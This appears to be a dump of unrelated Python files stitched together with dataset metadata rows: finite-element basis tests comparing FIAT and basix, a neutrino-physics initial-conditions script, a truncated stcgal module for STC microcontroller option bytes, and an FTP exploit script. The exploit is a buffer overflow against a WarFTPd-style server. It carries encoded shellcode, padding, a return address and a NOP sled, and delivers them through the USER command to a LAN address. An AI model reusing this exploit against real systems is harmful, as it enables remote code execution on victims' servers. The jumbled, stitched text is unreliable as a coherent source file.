L = basix.Lagrange(cell_type, order)
tab_basix = L.tabulate(nderivs, pts)
print(nderivs, len(tab_basix))
np.set_printoptions(suppress=True, precision=2, linewidth=200)
print()
for p in range(nderivs + 1):
for q in range(p + 1):
t = (p - q, q)
print("idx = ", basix.index(p - q, q))
print(tab_fiat[t])
print(tab_basix[basix.index(p - q, q)].transpose())
print()
assert(np.isclose(tab_fiat[t],
tab_basix[basix.index(p - q, q)].
transpose()).all())
@pytest.mark.parametrize("order", [1, 3])
def test_triangle_rt(order):
cell_type = basix.CellType.triangle
pts = basix.create_lattice(cell_type, 2, True)
nderivs = 2
cell = FIAT.ufc_simplex(2)
L = FIAT.RaviartThomas(cell, order, variant='integral')
tab_fiat = L.tabulate(nderivs, pts)
L = basix.RaviartThomas(cell_type, order)
tab_basix = L.tabulate(nderivs, pts)
print(nderivs, len(tab_basix))
np.set_printoptions(suppress=True, precision=2, linewidth=200)
print()
for p in range(nderivs + 1):
for q in range(p + 1):
t = (p - q, q)
print("idx = ", basix.index(p - q, q))
tab_fiat_cat = np.vstack((tab_fiat[t][:, 0, :],
tab_fiat[t][:, 1, :]))
# print(tab_fiat[t][:,0,:])
# print(tab_fiat[t][:,1,:])
print(tab_fiat_cat)
print(tab_basix[basix.index(p - q, q)].transpose())
print()
print(np.isclose(tab_fiat_cat,
tab_basix[basix.index(p - q, q)].transpose()))
assert(np.isclose(tab_fiat_cat,
tab_basix[basix.index(p - q, q)]
.transpose()).all())
@pytest.mark.parametrize("order", [1, 2, 3])
def test_triangle_ned(order):
cell_type = basix.CellType.triangle
pts = basix.create_lattice(cell_type, 2, True)
nderivs = 2
cell = FIAT.ufc_simplex(2)
L = FIAT.Nedelec(cell, order, variant='integral')
tab_fiat = L.tabulate(nderivs, pts)
L = basix.Nedelec(cell_type, order)
tab_basix = L.tabulate(nderivs, pts)
print(nderivs, len(tab_basix))
np.set_printoptions(suppress=True, precision=2, linewidth=200)
print()
for p in range(nderivs + 1):
for q in range(p + 1):
t = (p - q, q)
print("basix.index = ", basix.index(p - q, q))
tab_fiat_cat = np.vstack((tab_fiat[t][:, 0, :],
tab_fiat[t][:, 1, :]))
# print(tab_fiat[t][:,0,:])
# print(tab_fiat[t][:,1,:])
print(tab_fiat_cat)
print(tab_basix[basix.index(p - q, q)].transpose())
print()
print(np.isclose(tab_fiat_cat,
tab_basix[basix.index(p - q, q)].transpose()))
assert(np.isclose(tab_fiat_cat,
tab_basix[basix.index(p - q, q)].
transpose()).all())
@pytest.mark.parametrize("order", [1, 2, 3, 4])
def test_tet(order):
nderivs = order
cell = FIAT.ufc_simplex(3)
L = FIAT.Lagrange(cell, order)
cell_type = basix.simplex_type(3)
pts = basix.create_lattice(cell_type, 7, True)
print(pts)
tab_fiat = L.tabulate(nderivs, pts)
L = basix.Lagrange(cell_type, order)
tab_basix = L.tabulate(nderivs, pts)
print(nderivs, len(tab_basix))
np.set_printoptions(suppress=True, precision=2, linewidth=200)
print()
for p in range(nderivs + 1):
for q in range(p + 1):
for r in range(q + 1):
t = (p - q, q - r, r)
print("basix.index = ", basix.index(*t))
print(tab_fiat[t])
print(tab_basix[basix.index(*t)].transpose())
print()
assert(np.isclose(tab_fiat[t],
tab_basix[basix.index(*t)]
.transpose()).all())
| 33.580882
| 75
| 0.543683
| 604
| 4,567
| 3.976821
| 0.13245
| 0.069942
| 0.018734
| 0.054954
| 0.866778
| 0.850125
| 0.833472
| 0.833472
| 0.813905
| 0.780183
| 0
| 0.018826
| 0.313773
| 4,567
| 135
| 76
| 33.82963
| 0.747607
| 0.029779
| 0
| 0.745283
| 0
| 0
| 0.017732
| 0
| 0
| 0
| 0
| 0
| 0.037736
| 1
| 0.037736
| false
| 0
| 0.037736
| 0
| 0.075472
| 0.292453
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
24e7c60d08b386aab07f3e5e5c77e69cb4dc1598
| 1,970
|
py
|
Python
|
exploitftp.py
|
0x00s4d/exploit-warftpd
|
f6cd3d3cef5bcebf931d4a23fae67acb91347c77
|
[
"MIT"
] | 1
|
2020-04-16T12:00:44.000Z
|
2020-04-16T12:00:44.000Z
|
exploitftp.py
|
0x00s4d/exploit-warftpd
|
f6cd3d3cef5bcebf931d4a23fae67acb91347c77
|
[
"MIT"
] | null | null | null |
exploitftp.py
|
0x00s4d/exploit-warftpd
|
f6cd3d3cef5bcebf931d4a23fae67acb91347c77
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
import socket
buf = ""
buf += "\xbb\xa1\x56\xbc\xc8\xda\xd2\xd9\x74\x24\xf4\x5d\x31"
buf += "\xc9\xb1\x52\x83\xed\xfc\x31\x5d\x0e\x03\xfc\x58\x5e"
buf += "\x3d\x02\x8c\x1c\xbe\xfa\x4d\x41\x36\x1f\x7c\x41\x2c"
buf += "\x54\x2f\x71\x26\x38\xdc\xfa\x6a\xa8\x57\x8e\xa2\xdf"
buf += "\xd0\x25\x95\xee\xe1\x16\xe5\x71\x62\x65\x3a\x51\x5b"
buf += "\xa6\x4f\x90\x9c\xdb\xa2\xc0\x75\x97\x11\xf4\xf2\xed"
buf += "\xa9\x7f\x48\xe3\xa9\x9c\x19\x02\x9b\x33\x11\x5d\x3b"
buf += "\xb2\xf6\xd5\x72\xac\x1b\xd3\xcd\x47\xef\xaf\xcf\x81"
buf += "\x21\x4f\x63\xec\x8d\xa2\x7d\x29\x29\x5d\x08\x43\x49"
buf += "\xe0\x0b\x90\x33\x3e\x99\x02\x93\xb5\x39\xee\x25\x19"
buf += "\xdf\x65\x29\xd6\xab\x21\x2e\xe9\x78\x5a\x4a\x62\x7f"
buf += "\x8c\xda\x30\xa4\x08\x86\xe3\xc5\x09\x62\x45\xf9\x49"
buf += "\xcd\x3a\x5f\x02\xe0\x2f\xd2\x49\x6d\x83\xdf\x71\x6d"
buf += "\x8b\x68\x02\x5f\x14\xc3\x8c\xd3\xdd\xcd\x4b\x13\xf4"
buf += "\xaa\xc3\xea\xf7\xca\xca\x28\xa3\x9a\x64\x98\xcc\x70"
buf += "\x74\x25\x19\xd6\x24\x89\xf2\x97\x94\x69\xa3\x7f\xfe"
buf += "\x65\x9c\x60\x01\xac\xb5\x0b\xf8\x27\x7a\x63\x02\xb3"
buf += "\x12\x76\x02\xc2\x59\xff\xe4\xae\x8d\x56\xbf\x46\x37"
buf += "\xf3\x4b\xf6\xb8\x29\x36\x38\x32\xde\xc7\xf7\xb3\xab"
buf += "\xdb\x60\x34\xe6\x81\x27\x4b\xdc\xad\xa4\xde\xbb\x2d"
buf += "\xa2\xc2\x13\x7a\xe3\x35\x6a\xee\x19\x6f\xc4\x0c\xe0"
buf += "\xe9\x2f\x94\x3f\xca\xae\x15\xcd\x76\x95\x05\x0b\x76"
buf += "\x91\x71\xc3\x21\x4f\x2f\xa5\x9b\x21\x99\x7f\x77\xe8"
buf += "\x4d\xf9\xbb\x2b\x0b\x06\x96\xdd\xf3\xb7\x4f\x98\x0c"
buf += "\x77\x18\x2c\x75\x65\xb8\xd3\xac\x2d\xc8\x99\xec\x04"
buf += "\x41\x44\x65\x15\x0c\x77\x50\x5a\x29\xf4\x50\x23\xce"
buf += "\xe4\x11\x26\x8a\xa2\xca\x5a\x83\x46\xec\xc9\xa4\x42"
buffer = "A" * 485 + "\xfb\x51\xbd\x7c" + "x90" * (1100 - 489 - len(buf)) + buf
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.109",21))
r = s.recv(1024)
print r
s.send("USER "+buffer+"\r\n")
r = s.recv(1024)
print r
| 41.914894
| 79
| 0.667005
| 431
| 1,970
| 3.044084
| 0.519722
| 0.004573
| 0.009146
| 0.015244
| 0.02439
| 0.02439
| 0
| 0
| 0
| 0
| 0
| 0.257065
| 0.06599
| 1,970
| 46
| 80
| 42.826087
| 0.455978
| 0.008122
| 0
| 0.108108
| 0
| 0.72973
| 0.7423
| 0.720739
| 0.027027
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0.027027
| null | null | 0.054054
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
24f9a85c78f568eca2b01a93f139c948fe8f1d0c
| 2,048
|
py
|
Python
|
Old/Initial_Conditions.py
|
pedrodedin/Neutrino-Collective-Effects
|
d91c3f910a6407afe39d4c8f90c6d0765c0fc44c
|
[
"MIT"
] | null | null | null |
Old/Initial_Conditions.py
|
pedrodedin/Neutrino-Collective-Effects
|
d91c3f910a6407afe39d4c8f90c6d0765c0fc44c
|
[
"MIT"
] | null | null | null |
Old/Initial_Conditions.py
|
pedrodedin/Neutrino-Collective-Effects
|
d91c3f910a6407afe39d4c8f90c6d0765c0fc44c
|
[
"MIT"
] | null | null | null |
from Auxiliar_Functions import *
def initiate(nu_types,t_bins,E_i,E_f,E_step,E_0,Amplitude):
y0=[] #Initial state
omega=[]
flavor_sign=1
E_vec=np.arange(E_i,E_f,E_step)
n_E=len(E_vec)
n_f=len(nu_types)
n_dim=(n_f**2)-1
for i in range(n_E):
omega.append(delta_m2_31/(2*E_vec[i]*10**6)) #eV
for j in range(n_f):
if nu_types[j]=="nu_x":
flavor_sign=-1
if nu_types[j]=="nu_e":
flavor_sign=1
#nu
nu_spec=Amplitude[n_f*j]*phi_vec(E_vec[i],E_0[n_f*j],2.3)*E_step
y0.append(0)
y0.append(0)
y0.append(flavor_sign*nu_spec)
#nubar
nu_spec=Amplitude[n_f*j+1]*phi_vec(E_vec[i],E_0[n_f*j+1],2.3)*E_step
y0.append(0)
y0.append(0)
y0.append(flavor_sign*nu_spec)
#mu
mu_0=(10)*max(omega)
#time
t_max = 4*(2*np.pi/min(omega)) #eV⁻¹
w_max=max(mu_0,max(omega))
t_step = (2*np.pi/w_max)/5 #eV⁻¹
t_vec = np.arange(0., t_bins*t_step , t_step) #eV⁻¹
return y0,omega,E_vec,t_vec,mu_0,n_f,n_dim,n_E
def initiate_v2(nu_types,t_bins,E_i,E_f,E_step,E_0,Amplitude):
y0=[] #Initial state
omega=[]
flavor_sign=1
E_vec=np.arange(E_i,E_f,E_step)
n_E=len(E_vec)
n_f=len(nu_types)
n_dim=(n_f**2)-1
for i in range(n_E):
omega.append(delta_m2_31/(2*E_vec[i]*10**6)) #eV
#nu
nu_e_spec=Amplitude[0]*phi_vec(E_vec[i],E_0[0],2.3)*E_step
nu_x_spec=Amplitude[2]*phi_vec(E_vec[i],E_0[2],2.3)*E_step
#Pz=(nu_e_spec-nu_x_spec)/(nu_e_spec+nu_x_spec)
Pz=(nu_e_spec-nu_x_spec)
y0.append(0)
y0.append(0)
y0.append(Pz)
#nubar
nu_e_spec=Amplitude[1]*phi_vec(E_vec[i],E_0[1],2.3)*E_step
nu_x_spec=Amplitude[3]*phi_vec(E_vec[i],E_0[3],2.3)*E_step
#Pz=(nu_e_spec-nu_x_spec)/(nu_e_spec+nu_x_spec)
Pz=(nu_e_spec-nu_x_spec)
y0.append(0)
y0.append(0)
y0.append(Pz)
#mu
mu_0=(10)*max(omega)
#time
t_max = 4*(2*np.pi/min(omega)) #eV⁻¹
w_max=max(mu_0,max(omega))
t_step = (2*np.pi/w_max)/5 #eV⁻¹
t_vec = np.arange(0., t_bins*t_step , t_step) #eV⁻¹
return y0,omega,E_vec,t_vec,mu_0,n_f,n_dim,n_E
| 24.380952
| 73
| 0.650879
| 487
| 2,048
| 2.443532
| 0.12115
| 0.047059
| 0.033613
| 0.07395
| 0.882353
| 0.860504
| 0.830252
| 0.797479
| 0.746218
| 0.746218
| 0
| 0.060023
| 0.162109
| 2,048
| 83
| 74
| 24.674699
| 0.629953
| 0.091797
| 0
| 0.775862
| 0
| 0
| 0.004348
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034483
| false
| 0
| 0.017241
| 0
| 0.086207
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
703f288c5501765c2ba8d727eecd70693bc74378
| 26,956
|
py
|
Python
|
stcgal/options.py
|
CreativeLau/stcgal
|
b92ba84bfbad1e9f0e7eb62d6bf38000f1f7b8ce
|
[
"MIT"
] | 469
|
2015-04-20T07:42:08.000Z
|
2022-03-28T07:07:10.000Z
|
stcgal/options.py
|
CreativeLau/stcgal
|
b92ba84bfbad1e9f0e7eb62d6bf38000f1f7b8ce
|
[
"MIT"
] | 69
|
2015-02-02T05:45:23.000Z
|
2022-03-06T01:26:20.000Z
|
stcgal/options.py
|
CreativeLau/stcgal
|
b92ba84bfbad1e9f0e7eb62d6bf38000f1f7b8ce
|
[
"MIT"
] | 110
|
2015-11-24T22:37:59.000Z
|
2022-03-26T18:33:21.000Z
|
#
# Copyright (c) 2013-2016 Grigori Goronzy <greg@chown.ath.cx>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
import struct
from abc import ABC
from stcgal.utils import Utils
class BaseOption(ABC):
"""Base class for options"""
def __init__(self):
self.options = ()
self.msr = None
def print(self):
"""Print current configuration to standard output"""
print("Target options:")
for name, get_func, _ in self.options:
print(" %s=%s" % (name, get_func()))
def set_option(self, name, value):
"""Set value of a specific option"""
for opt, _, set_func in self.options:
if opt == name:
print("Option %s=%s" % (name, value))
set_func(value)
return
raise ValueError("unknown")
def get_option(self, name):
"""Get option value for a specific option"""
for opt, get_func, _ in self.options:
if opt == name:
return get_func(name)
raise ValueError("unknown")
def get_msr(self):
"""Get array of model-specific configuration registers"""
return bytes(self.msr)
class Stc89Option(BaseOption):
"""Manipulation STC89 series option byte"""
def __init__(self, msr):
super().__init__()
self.msr = msr
self.options = (
("cpu_6t_enabled", self.get_t6, self.set_t6),
("bsl_pindetect_enabled", self.get_pindetect, self.set_pindetect),
("eeprom_erase_enabled", self.get_ee_erase, self.set_ee_erase),
("clock_gain", self.get_clock_gain, self.set_clock_gain),
("ale_enabled", self.get_ale, self.set_ale),
("xram_enabled", self.get_xram, self.set_xram),
("watchdog_por_enabled", self.get_watchdog, self.set_watchdog),
)
def get_msr(self):
return self.msr
def get_t6(self):
return not bool(self.msr & 1)
def set_t6(self, val):
val = Utils.to_bool(val)
self.msr &= 0xfe
self.msr |= 0x01 if not bool(val) else 0x00
def get_pindetect(self):
return not bool(self.msr & 4)
def set_pindetect(self, val):
val = Utils.to_bool(val)
self.msr &= 0xfb
self.msr |= 0x04 if not bool(val) else 0x00
def get_ee_erase(self):
return not bool(self.msr & 8)
def set_ee_erase(self, val):
val = Utils.to_bool(val)
self.msr &= 0xf7
self.msr |= 0x08 if not bool(val) else 0x00
def get_clock_gain(self):
gain = bool(self.msr & 16)
return "high" if gain else "low"
def set_clock_gain(self, val):
gains = {"low": 0, "high": 0x10}
if val not in gains.keys():
raise ValueError("must be one of %s" % list(gains.keys()))
self.msr &= 0xef
self.msr |= gains[val]
def get_ale(self):
return bool(self.msr & 32)
def set_ale(self, val):
val = Utils.to_bool(val)
self.msr &= 0xdf
self.msr |= 0x20 if bool(val) else 0x00
def get_xram(self):
return bool(self.msr & 64)
def set_xram(self, val):
val = Utils.to_bool(val)
self.msr &= 0xbf
self.msr |= 0x40 if bool(val) else 0x00
def get_watchdog(self):
return not bool(self.msr & 128)
def set_watchdog(self, val):
val = Utils.to_bool(val)
self.msr &= 0x7f
self.msr |= 0x80 if not bool(val) else 0x00
class Stc12AOption(BaseOption):
"""Manipulate STC12A series option bytes"""
def __init__(self, msr):
super().__init__()
assert len(msr) == 4
self.msr = bytearray(msr)
"""list of options and their handlers"""
self.options = (
("low_voltage_reset", self.get_low_voltage_detect, self.set_low_voltage_detect),
("clock_source", self.get_clock_source, self.set_clock_source),
("watchdog_por_enabled", self.get_watchdog, self.set_watchdog),
("watchdog_stop_idle", self.get_watchdog_idle, self.set_watchdog_idle),
("watchdog_prescale", self.get_watchdog_prescale, self.set_watchdog_prescale),
("eeprom_erase_enabled", self.get_ee_erase, self.set_ee_erase),
("bsl_pindetect_enabled", self.get_pindetect, self.set_pindetect),
)
def get_low_voltage_detect(self):
lvd = bool(self.msr[3] & 64)
return "high" if not lvd else "low"
def set_low_voltage_detect(self, val):
lvds = {"low": 1, "high": 0}
if val not in lvds.keys():
raise ValueError("must be one of %s" % list(lvds.keys()))
self.msr[3] &= 0xbf
self.msr[3] |= lvds[val] << 6
def get_clock_source(self):
source = bool(self.msr[0] & 2)
return "external" if source else "internal"
def set_clock_source(self, val):
sources = {"internal": 0, "external": 1}
if val not in sources.keys():
raise ValueError("must be one of %s" % list(sources.keys()))
self.msr[0] &= 0xfd
self.msr[0] |= sources[val] << 1
def get_watchdog(self):
return not bool(self.msr[1] & 32)
def set_watchdog(self, val):
val = Utils.to_bool(val)
self.msr[1] &= 0xdf
self.msr[1] |= 0x20 if not val else 0x00
def get_watchdog_idle(self):
return not bool(self.msr[1] & 8)
def set_watchdog_idle(self, val):
val = Utils.to_bool(val)
self.msr[1] &= 0xf7
self.msr[1] |= 0x08 if not val else 0x00
def get_watchdog_prescale(self):
return 2 ** (((self.msr[1]) & 0x07) + 1)
def set_watchdog_prescale(self, val):
val = Utils.to_int(val)
wd_vals = {2: 0, 4: 1, 8: 2, 16: 3, 32: 4, 64: 5, 128: 6, 256: 7}
if val not in wd_vals.keys():
raise ValueError("must be one of %s" % list(wd_vals.keys()))
self.msr[1] &= 0xf8
self.msr[1] |= wd_vals[val]
def get_ee_erase(self):
return not bool(self.msr[2] & 2)
def set_ee_erase(self, val):
val = Utils.to_bool(val)
self.msr[2] &= 0xfd
self.msr[2] |= 0x02 if not val else 0x00
def get_pindetect(self):
return not bool(self.msr[2] & 1)
def set_pindetect(self, val):
val = Utils.to_bool(val)
self.msr[2] &= 0xfe
self.msr[2] |= 0x01 if not val else 0x00
class Stc12Option(BaseOption):
"""Manipulate STC10/11/12 series option bytes"""
def __init__(self, msr):
super().__init__()
assert len(msr) == 4
self.msr = bytearray(msr)
"""list of options and their handlers"""
self.options = (
("reset_pin_enabled", self.get_reset_pin_enabled, self.set_reset_pin_enabled),
("low_voltage_reset", self.get_low_voltage_detect, self.set_low_voltage_detect),
("oscillator_stable_delay", self.get_osc_stable_delay, self.set_osc_stable_delay),
("por_reset_delay", self.get_por_delay, self.set_por_delay),
("clock_gain", self.get_clock_gain, self.set_clock_gain),
("clock_source", self.get_clock_source, self.set_clock_source),
("watchdog_por_enabled", self.get_watchdog, self.set_watchdog),
("watchdog_stop_idle", self.get_watchdog_idle, self.set_watchdog_idle),
("watchdog_prescale", self.get_watchdog_prescale, self.set_watchdog_prescale),
("eeprom_erase_enabled", self.get_ee_erase, self.set_ee_erase),
("bsl_pindetect_enabled", self.get_pindetect, self.set_pindetect),
)
def get_reset_pin_enabled(self):
return bool(self.msr[0] & 1)
def set_reset_pin_enabled(self, val):
val = Utils.to_bool(val)
self.msr[0] &= 0xfe
self.msr[0] |= 0x01 if bool(val) else 0x00
def get_low_voltage_detect(self):
return not bool(self.msr[0] & 64)
def set_low_voltage_detect(self, val):
val = Utils.to_bool(val)
self.msr[0] &= 0xbf
self.msr[0] |= 0x40 if not val else 0x00
def get_osc_stable_delay(self):
return 2 ** (((self.msr[0] >> 4) & 0x03) + 12)
def set_osc_stable_delay(self, val):
val = Utils.to_int(val)
osc_vals = {4096: 0, 8192: 1, 16384: 2, 32768: 3}
if val not in osc_vals.keys():
raise ValueError("must be one of %s" % list(osc_vals.keys()))
self.msr[0] &= 0xcf
self.msr[0] |= osc_vals[val] << 4
def get_por_delay(self):
delay = not bool(self.msr[1] & 128)
return "long" if delay else "short"
def set_por_delay(self, val):
delays = {"short": 1, "long": 0}
if val not in delays.keys():
raise ValueError("must be one of %s" % list(delays.keys()))
self.msr[1] &= 0x7f
self.msr[1] |= delays[val] << 7
def get_clock_gain(self):
gain = bool(self.msr[1] & 64)
return "high" if gain else "low"
def set_clock_gain(self, val):
gains = {"low": 0, "high": 1}
if val not in gains.keys():
raise ValueError("must be one of %s" % list(gains.keys()))
self.msr[1] &= 0xbf
self.msr[1] |= gains[val] << 6
def get_clock_source(self):
source = bool(self.msr[1] & 2)
return "external" if source else "internal"
def set_clock_source(self, val):
sources = {"internal": 0, "external": 1}
if val not in sources.keys():
raise ValueError("must be one of %s" % list(sources.keys()))
self.msr[1] &= 0xfd
self.msr[1] |= sources[val] << 1
def get_watchdog(self):
return not bool(self.msr[2] & 32)
def set_watchdog(self, val):
val = Utils.to_bool(val)
self.msr[2] &= 0xdf
self.msr[2] |= 0x20 if not val else 0x00
def get_watchdog_idle(self):
return not bool(self.msr[2] & 8)
def set_watchdog_idle(self, val):
val = Utils.to_bool(val)
self.msr[2] &= 0xf7
self.msr[2] |= 0x08 if not val else 0x00
def get_watchdog_prescale(self):
return 2 ** (((self.msr[2]) & 0x07) + 1)
def set_watchdog_prescale(self, val):
val = Utils.to_int(val)
wd_vals = {2: 0, 4: 1, 8: 2, 16: 3, 32: 4, 64: 5, 128: 6, 256: 7}
if val not in wd_vals.keys():
raise ValueError("must be one of %s" % list(wd_vals.keys()))
self.msr[2] &= 0xf8
self.msr[2] |= wd_vals[val]
def get_ee_erase(self):
return not bool(self.msr[3] & 2)
def set_ee_erase(self, val):
val = Utils.to_bool(val)
self.msr[3] &= 0xfd
self.msr[3] |= 0x02 if not val else 0x00
def get_pindetect(self):
return not bool(self.msr[3] & 1)
def set_pindetect(self, val):
val = Utils.to_bool(val)
self.msr[3] &= 0xfe
self.msr[3] |= 0x01 if not val else 0x00
class Stc15AOption(BaseOption):
def __init__(self, msr):
super().__init__()
assert len(msr) == 13
self.msr = bytearray(msr)
self.options = (
("reset_pin_enabled", self.get_reset_pin_enabled, self.set_reset_pin_enabled),
("watchdog_por_enabled", self.get_watchdog, self.set_watchdog),
("watchdog_stop_idle", self.get_watchdog_idle, self.set_watchdog_idle),
("watchdog_prescale", self.get_watchdog_prescale, self.set_watchdog_prescale),
("low_voltage_reset", self.get_lvrs, self.set_lvrs),
("low_voltage_threshold", self.get_low_voltage, self.set_low_voltage),
("eeprom_lvd_inhibit", self.get_eeprom_lvd, self.set_eeprom_lvd),
("eeprom_erase_enabled", self.get_ee_erase, self.set_ee_erase),
("bsl_pindetect_enabled", self.get_pindetect, self.set_pindetect),
)
def set_trim(self, val):
self.msr[3:5] = struct.pack(">H", val)
def get_reset_pin_enabled(self):
return bool(self.msr[0] & 16)
def set_reset_pin_enabled(self, val):
val = Utils.to_bool(val)
self.msr[0] &= 0xef
self.msr[0] |= 0x10 if bool(val) else 0x00
def get_watchdog(self):
return not bool(self.msr[2] & 32)
def set_watchdog(self, val):
val = Utils.to_bool(val)
self.msr[2] &= 0xdf
self.msr[2] |= 0x20 if not val else 0x00
def get_watchdog_idle(self):
return not bool(self.msr[2] & 8)
def set_watchdog_idle(self, val):
val = Utils.to_bool(val)
self.msr[2] &= 0xf7
self.msr[2] |= 0x08 if not val else 0x00
def get_watchdog_prescale(self):
return 2 ** (((self.msr[2]) & 0x07) + 1)
def set_watchdog_prescale(self, val):
val = Utils.to_int(val)
wd_vals = {2: 0, 4: 1, 8: 2, 16: 3, 32: 4, 64: 5, 128: 6, 256: 7}
if val not in wd_vals.keys():
raise ValueError("must be one of %s" % list(wd_vals.keys()))
self.msr[2] &= 0xf8
self.msr[2] |= wd_vals[val]
def get_lvrs(self):
return bool(self.msr[1] & 64)
def set_lvrs(self, val):
val = Utils.to_bool(val)
self.msr[1] &= 0xbf
self.msr[1] |= 0x40 if val else 0x00
def get_eeprom_lvd(self):
return bool(self.msr[1] & 128)
def set_eeprom_lvd(self, val):
val = Utils.to_bool(val)
self.msr[1] &= 0x7f
self.msr[1] |= 0x80 if val else 0x00
def get_low_voltage(self):
return self.msr[1] & 0x07
def set_low_voltage(self, val):
val = Utils.to_int(val)
if val not in range(0, 8):
raise ValueError("must be one of %s" % list(range(0, 8)))
self.msr[1] &= 0xf8
self.msr[1] |= val
def get_ee_erase(self):
return not bool(self.msr[12] & 2)
def set_ee_erase(self, val):
val = Utils.to_bool(val)
self.msr[12] &= 0xfd
self.msr[12] |= 0x02 if not val else 0x00
def get_pindetect(self):
return not bool(self.msr[12] & 1)
def set_pindetect(self, val):
val = Utils.to_bool(val)
self.msr[12] &= 0xfe
self.msr[12] |= 0x01 if not val else 0x00
class Stc15Option(BaseOption):
def __init__(self, msr):
super().__init__()
assert len(msr) >= 4
self.msr = bytearray(msr)
self.options = (
("reset_pin_enabled", self.get_reset_pin_enabled, self.set_reset_pin_enabled),
("clock_source", self.get_clock_source, self.set_clock_source),
("clock_gain", self.get_clock_gain, self.set_clock_gain),
("watchdog_por_enabled", self.get_watchdog, self.set_watchdog),
("watchdog_stop_idle", self.get_watchdog_idle, self.set_watchdog_idle),
("watchdog_prescale", self.get_watchdog_prescale, self.set_watchdog_prescale),
("low_voltage_reset", self.get_lvrs, self.set_lvrs),
("low_voltage_threshold", self.get_low_voltage, self.set_low_voltage),
("eeprom_lvd_inhibit", self.get_eeprom_lvd, self.set_eeprom_lvd),
("eeprom_erase_enabled", self.get_ee_erase, self.set_ee_erase),
("bsl_pindetect_enabled", self.get_pindetect, self.set_pindetect),
("por_reset_delay", self.get_por_delay, self.set_por_delay),
("rstout_por_state", self.get_p33_state, self.set_p33_state),
("uart2_passthrough", self.get_uart_passthrough, self.set_uart_passthrough),
("uart2_pin_mode", self.get_uart_pin_mode, self.set_uart_pin_mode),
)
if len(msr) > 4:
self.options += (("cpu_core_voltage", self.get_core_voltage, self.set_core_voltage),)
def get_reset_pin_enabled(self):
return not bool(self.msr[2] & 16)
def set_reset_pin_enabled(self, val):
val = Utils.to_bool(val)
self.msr[2] &= 0xef
self.msr[2] |= 0x10 if not bool(val) else 0x00
def get_clock_source(self):
source = bool(self.msr[2] & 0x01)
return "internal" if source else "external"
def set_clock_source(self, val):
sources = {"internal": 1, "external": 0}
if val not in sources.keys():
raise ValueError("must be one of %s" % list(sources.keys()))
self.msr[2] &= 0xfe
self.msr[2] |= sources[val]
def get_clock_gain(self):
gain = bool(self.msr[2] & 0x02)
return "high" if gain else "low"
def set_clock_gain(self, val):
gains = {"low": 0, "high": 1}
if val not in gains.keys():
raise ValueError("must be one of %s" % list(gains.keys()))
self.msr[2] &= 0xfd
self.msr[2] |= gains[val] << 1
def get_watchdog(self):
return not bool(self.msr[0] & 32)
def set_watchdog(self, val):
val = Utils.to_bool(val)
self.msr[0] &= 0xdf
self.msr[0] |= 0x20 if not val else 0x00
def get_watchdog_idle(self):
return not bool(self.msr[0] & 8)
def set_watchdog_idle(self, val):
val = Utils.to_bool(val)
self.msr[0] &= 0xf7
self.msr[0] |= 0x08 if not val else 0x00
def get_watchdog_prescale(self):
return 2 ** (((self.msr[0]) & 0x07) + 1)
def set_watchdog_prescale(self, val):
val = Utils.to_int(val)
wd_vals = {2: 0, 4: 1, 8: 2, 16: 3, 32: 4, 64: 5, 128: 6, 256: 7}
if val not in wd_vals.keys():
raise ValueError("must be one of %s" % list(wd_vals.keys()))
self.msr[0] &= 0xf8
self.msr[0] |= wd_vals[val]
def get_lvrs(self):
return not bool(self.msr[1] & 64)
def set_lvrs(self, val):
val = Utils.to_bool(val)
self.msr[1] &= 0xbf
self.msr[1] |= 0x40 if not val else 0x00
def get_eeprom_lvd(self):
return bool(self.msr[1] & 128)
def set_eeprom_lvd(self, val):
val = Utils.to_bool(val)
self.msr[1] &= 0x7f
self.msr[1] |= 0x80 if val else 0x00
def get_low_voltage(self):
return self.msr[1] & 0x07
def set_low_voltage(self, val):
val = Utils.to_int(val)
if val not in range(0, 8):
raise ValueError("must be one of %s" % list(range(0, 8)))
self.msr[1] &= 0xf8
self.msr[1] |= val
def get_ee_erase(self):
return bool(self.msr[3] & 2)
def set_ee_erase(self, val):
val = Utils.to_bool(val)
self.msr[3] &= 0xfd
self.msr[3] |= 0x02 if val else 0x00
def get_pindetect(self):
return not bool(self.msr[3] & 1)
def set_pindetect(self, val):
val = Utils.to_bool(val)
self.msr[3] &= 0xfe
self.msr[3] |= 0x01 if not val else 0x00
def get_por_delay(self):
delay = bool(self.msr[2] & 128)
return "long" if delay else "short"
def set_por_delay(self, val):
